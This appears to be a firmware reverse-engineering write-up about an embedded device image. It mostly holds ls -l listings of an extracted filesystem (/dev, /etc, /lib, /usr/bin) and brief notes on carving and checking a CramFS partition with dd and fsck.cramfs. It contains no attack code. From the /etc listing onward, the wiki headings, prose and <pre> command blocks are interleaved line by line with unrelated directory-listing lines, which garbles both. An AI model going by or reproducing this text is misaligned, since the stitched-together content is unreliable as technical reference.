crw-rw-rw- 1 root tty    2,  48 Mar  3 03:37 ptys0
crw-rw-rw- 1 root tty    2,  49 Mar  3 03:37 ptys1
crw-rw-rw- 1 root tty    2,  50 Mar  3 03:37 ptys2
crw-rw-rw- 1 root tty    2,  51 Mar  3 03:37 ptys3
crw-rw-rw- 1 root tty    2,  52 Mar  3 03:37 ptys4
crw-rw-rw- 1 root tty    2,  53 Mar  3 03:37 ptys5
crw-rw-rw- 1 root tty    2,  54 Mar  3 03:37 ptys6
crw-rw-rw- 1 root tty    2,  55 Mar  3 03:37 ptys7
crw-rw-rw- 1 root tty    2,  56 Mar  3 03:37 ptys8
crw-rw-rw- 1 root tty    2,  57 Mar  3 03:37 ptys9
crw-rw-rw- 1 root tty    2,  58 Mar  3 03:37 ptysa
crw-rw-rw- 1 root tty    2,  59 Mar  3 03:37 ptysb
crw-rw-rw- 1 root tty    2,  60 Mar  3 03:37 ptysc
crw-rw-rw- 1 root tty    2,  61 Mar  3 03:37 ptysd
crw-rw-rw- 1 root tty    2,  62 Mar  3 03:37 ptyse
crw-rw-rw- 1 root tty    2,  63 Mar  3 03:37 ptysf
crw-rw-rw- 1 root tty    2,  64 Mar  3 03:37 ptyt0
crw-rw-rw- 1 root tty    2,  65 Mar  3 03:37 ptyt1
crw-rw-rw- 1 root tty    2,  66 Mar  3 03:37 ptyt2
crw-rw-rw- 1 root tty    2,  67 Mar  3 03:37 ptyt3
crw-rw-rw- 1 root tty    2,  68 Mar  3 03:37 ptyt4
crw-rw-rw- 1 root tty    2,  69 Mar  3 03:37 ptyt5
crw-rw-rw- 1 root tty    2,  70 Mar  3 03:37 ptyt6
crw-rw-rw- 1 root tty    2,  71 Mar  3 03:37 ptyt7
crw-rw-rw- 1 root tty    2,  72 Mar  3 03:37 ptyt8
crw-rw-rw- 1 root tty    2,  73 Mar  3 03:37 ptyt9
crw-rw-rw- 1 root tty    2,  74 Mar  3 03:37 ptyta
crw-rw-rw- 1 root tty    2,  75 Mar  3 03:37 ptytb
crw-rw-rw- 1 root tty    2,  76 Mar  3 03:37 ptytc
crw-rw-rw- 1 root tty    2,  77 Mar  3 03:37 ptytd
crw-rw-rw- 1 root tty    2,  78 Mar  3 03:37 ptyte
crw-rw-rw- 1 root tty    2,  79 Mar  3 03:37 ptytf
crw-rw-rw- 1 root tty    2,  80 Mar  3 03:37 ptyu0
crw-rw-rw- 1 root tty    2,  81 Mar  3 03:37 ptyu1
crw-rw-rw- 1 root tty    2,  82 Mar  3 03:37 ptyu2
crw-rw-rw- 1 root tty    2,  83 Mar  3 03:37 ptyu3
crw-rw-rw- 1 root tty    2,  84 Mar  3 03:37 ptyu4
crw-rw-rw- 1 root tty    2,  85 Mar  3 03:37 ptyu5
crw-rw-rw- 1 root tty    2,  86 Mar  3 03:37 ptyu6
crw-rw-rw- 1 root tty    2,  87 Mar  3 03:37 ptyu7
crw-rw-rw- 1 root tty    2,  88 Mar  3 03:37 ptyu8
crw-rw-rw- 1 root tty    2,  89 Mar  3 03:37 ptyu9
crw-rw-rw- 1 root tty    2,  90 Mar  3 03:37 ptyua
crw-rw-rw- 1 root tty    2,  91 Mar  3 03:37 ptyub
crw-rw-rw- 1 root tty    2,  92 Mar  3 03:37 ptyuc
crw-rw-rw- 1 root tty    2,  93 Mar  3 03:37 ptyud
crw-rw-rw- 1 root tty    2,  94 Mar  3 03:37 ptyue
crw-rw-rw- 1 root tty    2,  95 Mar  3 03:37 ptyuf
crw-rw-rw- 1 root tty    2,  96 Mar  3 03:37 ptyv0
crw-rw-rw- 1 root tty    2,  97 Mar  3 03:37 ptyv1
crw-rw-rw- 1 root tty    2,  98 Mar  3 03:37 ptyv2
crw-rw-rw- 1 root tty    2,  99 Mar  3 03:37 ptyv3
crw-rw-rw- 1 root tty    2, 100 Mar  3 03:37 ptyv4
crw-rw-rw- 1 root tty    2, 101 Mar  3 03:37 ptyv5
crw-rw-rw- 1 root tty    2, 102 Mar  3 03:37 ptyv6
crw-rw-rw- 1 root tty    2, 103 Mar  3 03:37 ptyv7
crw-rw-rw- 1 root tty    2, 104 Mar  3 03:37 ptyv8
crw-rw-rw- 1 root tty    2, 105 Mar  3 03:37 ptyv9
crw-rw-rw- 1 root tty    2, 106 Mar  3 03:37 ptyva
crw-rw-rw- 1 root tty    2, 107 Mar  3 03:37 ptyvb
crw-rw-rw- 1 root tty    2, 108 Mar  3 03:37 ptyvc
crw-rw-rw- 1 root tty    2, 109 Mar  3 03:37 ptyvd
crw-rw-rw- 1 root tty    2, 110 Mar  3 03:37 ptyve
crw-rw-rw- 1 root tty    2, 111 Mar  3 03:37 ptyvf
crw-rw-rw- 1 root tty    2, 112 Mar  3 03:37 ptyw0
crw-rw-rw- 1 root tty    2, 113 Mar  3 03:37 ptyw1
crw-rw-rw- 1 root tty    2, 114 Mar  3 03:37 ptyw2
crw-rw-rw- 1 root tty    2, 115 Mar  3 03:37 ptyw3
crw-rw-rw- 1 root tty    2, 116 Mar  3 03:37 ptyw4
crw-rw-rw- 1 root tty    2, 117 Mar  3 03:37 ptyw5
crw-rw-rw- 1 root tty    2, 118 Mar  3 03:37 ptyw6
crw-rw-rw- 1 root tty    2, 119 Mar  3 03:37 ptyw7
crw-rw-rw- 1 root tty    2, 120 Mar  3 03:37 ptyw8
crw-rw-rw- 1 root tty    2, 121 Mar  3 03:37 ptyw9
crw-rw-rw- 1 root tty    2, 122 Mar  3 03:37 ptywa
crw-rw-rw- 1 root tty    2, 123 Mar  3 03:37 ptywb
crw-rw-rw- 1 root tty    2, 124 Mar  3 03:37 ptywc
crw-rw-rw- 1 root tty    2, 125 Mar  3 03:37 ptywd
crw-rw-rw- 1 root tty    2, 126 Mar  3 03:37 ptywe
crw-rw-rw- 1 root tty    2, 127 Mar  3 03:37 ptywf
crw-rw-rw- 1 root tty    2, 128 Mar  3 03:37 ptyx0
crw-rw-rw- 1 root tty    2, 129 Mar  3 03:37 ptyx1
crw-rw-rw- 1 root tty    2, 130 Mar  3 03:37 ptyx2
crw-rw-rw- 1 root tty    2, 131 Mar  3 03:37 ptyx3
crw-rw-rw- 1 root tty    2, 132 Mar  3 03:37 ptyx4
crw-rw-rw- 1 root tty    2, 133 Mar  3 03:37 ptyx5
crw-rw-rw- 1 root tty    2, 134 Mar  3 03:37 ptyx6
crw-rw-rw- 1 root tty    2, 135 Mar  3 03:37 ptyx7
crw-rw-rw- 1 root tty    2, 136 Mar  3 03:37 ptyx8
crw-rw-rw- 1 root tty    2, 137 Mar  3 03:37 ptyx9
crw-rw-rw- 1 root tty    2, 138 Mar  3 03:37 ptyxa
crw-rw-rw- 1 root tty    2, 139 Mar  3 03:37 ptyxb
crw-rw-rw- 1 root tty    2, 140 Mar  3 03:37 ptyxc
crw-rw-rw- 1 root tty    2, 141 Mar  3 03:37 ptyxd
crw-rw-rw- 1 root tty    2, 142 Mar  3 03:37 ptyxe
crw-rw-rw- 1 root tty    2, 143 Mar  3 03:37 ptyxf
crw-rw-rw- 1 root tty    2, 144 Mar  3 03:37 ptyy0
crw-rw-rw- 1 root tty    2, 145 Mar  3 03:37 ptyy1
crw-rw-rw- 1 root tty    2, 146 Mar  3 03:37 ptyy2
crw-rw-rw- 1 root tty    2, 147 Mar  3 03:37 ptyy3
crw-rw-rw- 1 root tty    2, 148 Mar  3 03:37 ptyy4
crw-rw-rw- 1 root tty    2, 149 Mar  3 03:37 ptyy5
crw-rw-rw- 1 root tty    2, 150 Mar  3 03:37 ptyy6
crw-rw-rw- 1 root tty    2, 151 Mar  3 03:37 ptyy7
crw-rw-rw- 1 root tty    2, 152 Mar  3 03:37 ptyy8
crw-rw-rw- 1 root tty    2, 153 Mar  3 03:37 ptyy9
crw-rw-rw- 1 root tty    2, 154 Mar  3 03:37 ptyya
crw-rw-rw- 1 root tty    2, 155 Mar  3 03:37 ptyyb
crw-rw-rw- 1 root tty    2, 156 Mar  3 03:37 ptyyc
crw-rw-rw- 1 root tty    2, 157 Mar  3 03:37 ptyyd
crw-rw-rw- 1 root tty    2, 158 Mar  3 03:37 ptyye
crw-rw-rw- 1 root tty    2, 159 Mar  3 03:37 ptyyf
crw-rw-rw- 1 root tty    2, 160 Mar  3 03:37 ptyz0
crw-rw-rw- 1 root tty    2, 161 Mar  3 03:37 ptyz1
crw-rw-rw- 1 root tty    2, 162 Mar  3 03:37 ptyz2
crw-rw-rw- 1 root tty    2, 163 Mar  3 03:37 ptyz3
crw-rw-rw- 1 root tty    2, 164 Mar  3 03:37 ptyz4
crw-rw-rw- 1 root tty    2, 165 Mar  3 03:37 ptyz5
crw-rw-rw- 1 root tty    2, 166 Mar  3 03:37 ptyz6
crw-rw-rw- 1 root tty    2, 167 Mar  3 03:37 ptyz7
crw-rw-rw- 1 root tty    2, 168 Mar  3 03:37 ptyz8
crw-rw-rw- 1 root tty    2, 169 Mar  3 03:37 ptyz9
crw-rw-rw- 1 root tty    2, 170 Mar  3 03:37 ptyza
crw-rw-rw- 1 root tty    2, 171 Mar  3 03:37 ptyzb
crw-rw-rw- 1 root tty    2, 172 Mar  3 03:37 ptyzc
crw-rw-rw- 1 root tty    2, 173 Mar  3 03:37 ptyzd
crw-rw-rw- 1 root tty    2, 174 Mar  3 03:37 ptyze
crw-rw-rw- 1 root tty    2, 175 Mar  3 03:37 ptyzf
brw-r--r-- 1 root root  1,  0 Mar  3 03:37 ram0
brw-r--r-- 1 root root  1,  1 Mar  3 03:37 ram1
brw-r--r-- 1 root root  1,  10 Mar  3 03:37 ram10
brw-r--r-- 1 root root  1,  11 Mar  3 03:37 ram11
brw-r--r-- 1 root root  1,  12 Mar  3 03:37 ram12
brw-r--r-- 1 root root  1,  13 Mar  3 03:37 ram13
brw-r--r-- 1 root root  1,  14 Mar  3 03:37 ram14
brw-r--r-- 1 root root  1,  15 Mar  3 03:37 ram15
brw-r--r-- 1 root root  1,  16 Mar  3 03:37 ram16
brw-r--r-- 1 root root  1,  17 Mar  3 03:37 ram17
brw-r--r-- 1 root root  1,  18 Mar  3 03:37 ram18
brw-r--r-- 1 root root  1,  19 Mar  3 03:37 ram19
brw-r--r-- 1 root root  1,  2 Mar  3 03:37 ram2
brw-r--r-- 1 root root  1,  3 Mar  3 03:37 ram3
brw-r--r-- 1 root root  1,  4 Mar  3 03:37 ram4
brw-r--r-- 1 root root  1,  5 Mar  3 03:37 ram5
brw-r--r-- 1 root root  1,  6 Mar  3 03:37 ram6
brw-r--r-- 1 root root  1,  7 Mar  3 03:37 ram7
brw-r--r-- 1 root root  1,  8 Mar  3 03:37 ram8
brw-r--r-- 1 root root  1,  9 Mar  3 03:37 ram9
crw-r--r-- 1 root root  1,  8 Mar  3 03:37 random
crw-r--r-- 1 root root 127,  1 Mar  3 03:37 sep
lrwxrwxrwx 1 root root        4 Mar  3 03:51 stderr -> fd/0
lrwxrwxrwx 1 root root        4 Mar  3 03:51 stdin -> fd/1
lrwxrwxrwx 1 root root        4 Mar  3 03:51 stdout -> fd/2
crw-rw-rw- 1 root root  5,  0 Mar  3 03:37 tty
crw-rw-rw- 1 root tty    4,  0 Mar  3 03:37 tty0
crw-rw-rw- 1 root tty    4,  1 Mar  3 03:37 tty1
crw-rw-rw- 1 root tty    3,  0 Mar  3 03:37 ttyp0
crw-rw-rw- 1 root tty    3,  1 Mar  3 03:37 ttyp1
crw-rw-rw- 1 root tty    3,  2 Mar  3 03:37 ttyp2
crw-rw-rw- 1 root tty    3,  3 Mar  3 03:37 ttyp3
crw-rw-rw- 1 root tty    3,  4 Mar  3 03:37 ttyp4
crw-rw-rw- 1 root tty    3,  5 Mar  3 03:37 ttyp5
crw-rw-rw- 1 root tty    3,  6 Mar  3 03:37 ttyp6
crw-rw-rw- 1 root tty    3,  7 Mar  3 03:37 ttyp7
crw-rw-rw- 1 root tty    3,  8 Mar  3 03:37 ttyp8
crw-rw-rw- 1 root tty    3,  9 Mar  3 03:37 ttyp9
crw-rw-rw- 1 root tty    3,  10 Mar  3 03:37 ttypa
crw-rw-rw- 1 root tty    3,  11 Mar  3 03:37 ttypb
crw-rw-rw- 1 root tty    3,  12 Mar  3 03:37 ttypc
crw-rw-rw- 1 root tty    3,  13 Mar  3 03:37 ttypd
crw-rw-rw- 1 root tty    3,  14 Mar  3 03:37 ttype
crw-rw-rw- 1 root tty    3,  15 Mar  3 03:37 ttypf
crw-r--r-- 1 root root  4,  64 Mar  3 03:37 ttyS0
crw-r--r-- 1 root root  4,  65 Mar  3 03:37 ttyS1
crw-r--r-- 1 root root  1,  9 Mar  3 03:37 urandom


part5/etc:
'''fw''' and '''sw''', this is probably the interesting stuff? But where's the /islavista/conf/sw/php.ini?
total 12
lrwxrwxrwx  1 root root  10 Mar  3 03:51 fstab -> fstab_16mb
-rw-r--r--  1 root root  396 Nov 23  2004 fstab_16mb
-rw-r--r--  1 root root  317 Oct  4  2003 fstab_8mb
-rw-r--r--  1 root root  283 Sep 15  2003 group
-rw-r--r--  1 root root  50 Aug 29  2003 hosts
lrwxrwxrwx  1 root root  11 Mar  3 03:51 init.d -> rc.d/init.d
-rw-r--r--  1 root root    0 Aug 29  2003 modules
-rw-r--r--  1 root root    0 Aug 29  2003 motd
-rw-r--r--  1 root root    0 Aug 29  2003 mtab
-rw-r--r--  1 root root  68 Aug 29  2003 passwd
-rw-r--r--  1 root root  847 May 26  2005 profile
drwxr-xr-x 11 root root 1024 Jun  3  2004 rc.d
lrwxrwxrwx  1 root root  18 Mar  3 03:51 resolv.conf -> udhcpc/resolv.conf
-rw-r--r--  1 root root 1323 Aug 29  2003 services
-rw-r--r--  1 root root  87 Aug 29  2003 shadow
drwxr-xr-x  4 root root 1024 Jun  3  2004 sysconfig
drwxr-xr-x  3 root root 1024 Jun  3  2004 udhcpc


part5/etc/rc.d:
=== Fixing Part 3 ===
total 10
Part 3 is a broken CramFS, and Part 4 is a bzip2 file that is not a bzip2 file... smells fishy.
drwxr-xr-x 2 root root 1024 Jun  3  2004 CVS
Let's say Part 3 is actually Part 3.1 and Part 4 is Part 3.2:
drwxr-xr-x 2 root root 1024 Oct  9  2003 init.d
<pre>
-rwxr-xr-x 1 root root  65 Aug 29  2003 rc
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=3231744 of=part3.cramfs
drwxr-xr-x 2 root root 1024 Aug 29  2003 rc0.d
$ fsck.cramfs -v part3.cramfs
drwxr-xr-x 2 root root 1024 Aug 29  2003 rc1.d
</pre>
drwxr-xr-x 2 root root 1024 Aug 29  2003 rc2.d
<pre>
drwxr-xr-x 2 root root 1024 Aug 29  2003 rc3.d
cramfs endianness is little
drwxr-xr-x 2 root root 1024 Aug 29  2003 rc4.d
part3.cramfs: OK
drwxr-xr-x 2 root root 1024 Aug 29  2003 rc5.d
</pre>
drwxr-xr-x 2 root root 1024 Aug 29  2003 rc6.d
Bingo!


part5/etc/rc.d/CVS:
=== The Missing Link ===
total 3
There are a lot of strings throughout the fimware that point at 4 MTD blocks which get mounted into the /islavista/conf, /islavista/fw, /islavista/sw and /oem directories.
-rw-r--r-- 1 root root  2 Jun  3  2004 Entries
-rw-r--r-- 1 root root 39 Jun  3  2004 Repository
-rw-r--r-- 1 root root 52 Jun  3  2004 Root


part5/etc/rc.d/init.d:
Finding the contents of those blocks that gets written to the flash is the interesting part...
total 3
-rwxr-xr-x 1 root root 447 Aug 29  2003 killall
-rwxr-xr-x 1 root root 201 Sep 22  2003 rcS
-rwxr-xr-x 1 root root 160 Aug 29  2003 single


part5/etc/rc.d/rc0.d:
<pre>
total 0
/dev/mtdblock5 /islavista/fw      cramfs suid,dev,exec,auto,nouser,async,ro
 
/dev/mtdblock6 /islavista/sw      cramfs suid,dev,exec,auto,nouser,async,ro
part5/etc/rc.d/rc1.d:
/dev/mtdblock2 /islavista/conf    jffs2   defaults
total 0
/dev/mtdblock7 /oem               cramfs suid,dev,exec,auto,nouser,async,ro
lrwxrwxrwx 1 root root 16 Mar  3 03:51 S00single -> ../init.d/single
</pre>
 
part5/etc/rc.d/rc2.d:
total 0
 
part5/etc/rc.d/rc3.d:
total 0
 
part5/etc/rc.d/rc4.d:
total 0
 
part5/etc/rc.d/rc5.d:
total 0
 
part5/etc/rc.d/rc6.d:
total 0
 
part5/etc/sysconfig:
total 2
drwxr-xr-x 2 root root 1024 Jun 3  2004 CVS
drwxr-xr-x 3 root root 1024 Jun  3  2004 network
 
part5/etc/sysconfig/CVS:
total 4
-rw-r--r-- 1 root root  2 Jun 3  2004 Entries
-rw-r--r-- 1 root root 16 Jun  3  2004 Entries.Log
-rw-r--r-- 1 root root 44 Jun  3  2004 Repository
-rw-r--r-- 1 root root 52 Jun  3  2004 Root
 
part5/etc/sysconfig/network:
total 1
drwxr-xr-x 2 root root 1024 Jun  3 2004 CVS
 
part5/etc/sysconfig/network/CVS:
total 3
-rw-r--r-- 1 root root  2 Jun  3  2004 Entries
-rw-r--r-- 1 root root 52 Jun  3  2004 Repository
-rw-r--r-- 1 root root 52 Jun  3  2004 Root
 
part5/etc/udhcpc:
total 1
drwxr-xr-x 2 root root 1024 Jun  3  2004 CVS
-rw-r--r-- 1 root root    0 Aug 29 2003 resolv.conf
 
part5/etc/udhcpc/CVS:
total 3
-rw-r--r-- 1 root root 46 Jun  3  2004 Entries
-rw-r--r-- 1 root root 41 Jun  3  2004 Repository
-rw-r--r-- 1 root root 52 Jun  3  2004 Root
 
part5/islavista:
total 22
drwxr-xr-x 2 root root  1024 Mar  3 03:37 conf
drwxr-xr-x 2 root root  1024 Mar  3 03:37 flash
drwxr-xr-x 2 root root  1024 Mar  3 03:37 fw
-rw-r--r-- 1 root root 17321 Mar  3 03:51 rd_flash.gz
drwxr-xr-x 2 root root  1024 Mar 3 03:37 sw
 
part5/islavista/conf:
total 0
 
part5/islavista/flash:
total 0
 
part5/islavista/fw:
total 0
 
part5/islavista/sw:
total 0
 
part5/lib:
total 1098
-rwxr-xr-x 1 root root  20548 Mar  3 03:51 ld-uClibc-0.9.26.so
lrwxrwxrwx 1 root root    19 Mar  3 03:51 ld-uClibc.so.0 -> ld-uClibc-0.9.26.so
-rwxr-xr-x 1 root root  10312 Mar  3 03:51 libcrypt-0.9.26.so
lrwxrwxrwx 1 root root     18 Mar  3 03:51 libcrypt.so -> libcrypt-0.9.26.so
lrwxrwxrwx 1 root root    18 Mar  3 03:51 libcrypt.so.0 -> libcrypt-0.9.26.so
lrwxrwxrwx 1 root root    19 Mar  3 03:51 libc.so -> libuClibc-0.9.26.so
lrwxrwxrwx 1 root root    19 Mar  3 03:51 libc.so.0 -> libuClibc-0.9.26.so
-rwxr-xr-x 1 root root   6676 Mar  3 03:51 libdl-0.9.26.so
lrwxrwxrwx 1 root root    15 Mar  3 03:51 libdl.so -> libdl-0.9.26.so
lrwxrwxrwx 1 root root    15 Mar  3 03:51 libdl.so.0 -> libdl-0.9.26.so
lrwxrwxrwx 1 root root    13 Mar  3 03:51 libfloat.so -> libfloat.so.1
-rwxrwxr-x 1 root root  92392 Mar  3 03:51 libfloat.so.1
lrwxrwxrwx 1 root root    13 Mar  3 03:51 libgcc_s.so -> libgcc_s.so.1
-rwxr-xr-x 1 root root  29624 Mar  3 03:51 libgcc_s.so.1
-rwxr-xr-x 1 root root  79556 Mar  3 03:51 libm-0.9.26.so
lrwxrwxrwx 1 root root    14 Mar  3 03:51 libm.so -> libm-0.9.26.so
lrwxrwxrwx 1 root root    14 Mar  3 03:51 libm.so.0 -> libm-0.9.26.so
-rwxr-xr-x 1 root root  1688 Mar  3 03:51 libnsl-0.9.26.so
lrwxrwxrwx 1 root root    16 Mar  3 03:51 libnsl.so -> libnsl-0.9.26.so
lrwxrwxrwx 1 root root    16 Mar  3 03:51 libnsl.so.0 -> libnsl-0.9.26.so
-rwxr-xr-x 1 root root  66804 Mar  3 03:51 libpthread-0.9.26.so
lrwxrwxrwx 1 root root    20 Mar  3 03:51 libpthread.so -> libpthread-0.9.26.so
lrwxrwxrwx 1 root root    20 Mar  3 03:51 libpthread.so.0 -> libpthread-0.9.26.so
-rwxr-xr-x 1 root root  1696 Mar  3 03:51 libresolv-0.9.26.so
lrwxrwxrwx 1 root root    19 Mar  3 03:51 libresolv.so -> libresolv-0.9.26.so
lrwxrwxrwx 1 root root    19 Mar  3 03:51 libresolv.so.0 -> libresolv-0.9.26.so
lrwxrwxrwx 1 root root    18 Mar  3 03:51 libstdc++.so -> libstdc++.so.5.0.5
lrwxrwxrwx 1 root root    18 Mar  3 03:51 libstdc++.so.5 -> libstdc++.so.5.0.5
-rwxr-xr-x 1 root root 520652 Mar  3 03:51 libstdc++.so.5.0.5
-rwxr-xr-x 1 root root 272440 Mar  3 03:51 libuClibc-0.9.26.so
-rwxr-xr-x 1 root root  4320 Mar  3 03:51 libutil-0.9.26.so
lrwxrwxrwx 1 root root    17 Mar  3 03:51 libutil.so -> libutil-0.9.26.so
lrwxrwxrwx 1 root root    17 Mar  3 03:51 libutil.so.0 -> libutil-0.9.26.so
drwxr-xr-x 3 root root  1024 Mar  3 03:37 modules
 
part5/lib/modules:
total 1
drwxr-xr-x 3 root root 1024 Mar  3 03:37 2.4.21-timesys-4.1.447
 
part5/lib/modules/2.4.21-timesys-4.1.447:
total 1
drwxr-xr-x 2 root root 1024 Mar 3 03:37 misc
 
part5/lib/modules/2.4.21-timesys-4.1.447/misc:
total 147
-rw-r--r-- 1 root root 13272 Mar  3 03:37 fumutex.o
-rw-r--r-- 1 root root  4776 Mar  3 03:37 ioc80314_timer.o
-rw-r--r-- 1 root root 13804 Mar  3 03:37 ktimer.o
-rw-r--r-- 1 root root 15240 Mar  3 03:37 measure_rk.o
-rw-r--r-- 1 root root 14164 Mar  3 03:37 mqueue.o
-rw-r--r-- 1 root root 11108 Mar  3 03:37 mutex.o
-rw-r--r-- 1 root root  8416 Mar  3 03:37 pi.o
-rw-r--r-- 1 root root 10888 Mar  3 03:37 posix_timers.o
-rw-r--r-- 1 root root 50920 Mar  3 03:37 rk.o
 
part5/lost+found:
total 0
 
part5/mnt:
total 0
 
part5/oem:
total 0
 
part5/proc:
total 0
 
part5/sbin:
total 0
lrwxrwxrwx 1 root root 12 Mar  3 03:51 freeramdisk -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 getty -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 halt -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 hwclock -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 ifconfig -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 ifdown -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 ifup -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 init -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 insmod -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 klogd -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 logread -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 lsmod -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 makedevs -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 modprobe -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 poweroff -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 reboot -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 rmmod -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 route -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 sulogin -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 swapoff -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 swapon -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 syslogd -> /bin/busybox
lrwxrwxrwx 1 root root 12 Mar  3 03:51 udhcpc -> /bin/busybox
 
part5/tmp:
total 0
 
part5/usr:
total 7
drwxr-xr-x 2 root root 1024 Mar  3 03:51 bin
drwxr-xr-x 2 root root 2048 Mar  3 03:51 lib
drwxr-xr-x 2 root root 1024 Mar  3 03:37 local
drwxr-xr-x 2 root root 1024 Mar  3 03:37 man
drwxr-xr-x 2 root root 1024 Mar  3 03:45 sbin
drwxr-xr-x 3 root root 1024 Mar  3 03:51 share
 
part5/usr/bin:
total 1333
lrwxrwxrwx 1 root root      12 Mar  3 03:51 [ -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 ar -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 awk -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 basename -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 bunzip2 -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 bzcat -> /bin/busybox
-rwxr-xr-x 1 root root  30372 Mar  3 03:51 cimserver
-rwxr-xr-x 1 root root  81524 Mar  3 03:51 cimuser
lrwxrwxrwx 1 root root      12 Mar  3 03:51 clear -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 crontab -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 cut -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 dc -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 dirname -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 dos2unix -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 du -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 env -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 find -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 free -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 ftpget -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 ftpput -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 head -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 hexdump -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 hostid -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 id -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 killall -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 logger -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 md5sum -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 mesg -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 nslookup -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 passwd -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 patch -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 printf -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 realpath -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar 3 03:51 renice -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 reset -> /bin/busybox
-rwxr-xr-x 1 root root  179231 Mar  3 03:37 slpd
-rwxr-xr-x 1 root root  20012 Mar  3 03:44 snmpd
lrwxrwxrwx 1 root root      12 Mar  3 03:51 sort -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 strings -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 tail -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 tee -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 telnet -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 test -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 tftp -> /bin/busybox
-rwxr-xr-x 1 root root 1041980 Mar  3 03:42 thttpd
lrwxrwxrwx 1 root root      12 Mar  3 03:51 time -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 top -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 tr -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 traceroute -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 tty -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 uniq -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 unix2dos -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 unzip -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 uptime -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 vlock -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 wc -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 wget -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 which -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 who -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 whoami -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 xargs -> /bin/busybox
lrwxrwxrwx 1 root root      12 Mar  3 03:51 yes -> /bin/busybox
 
part5/usr/lib:
total 8510
-rwxr-xr-x 1 root root  24736 Mar  3 03:51 libCIMxmlIndicationHandler.so
-rwxr-xr-x 1 root root  535728 Mar  3 03:51 libCMPIProviderManager.so
lrwxrwxrwx 1 root root      14 Mar  3 03:51 libcrypto.so -> libcrypto.so.0
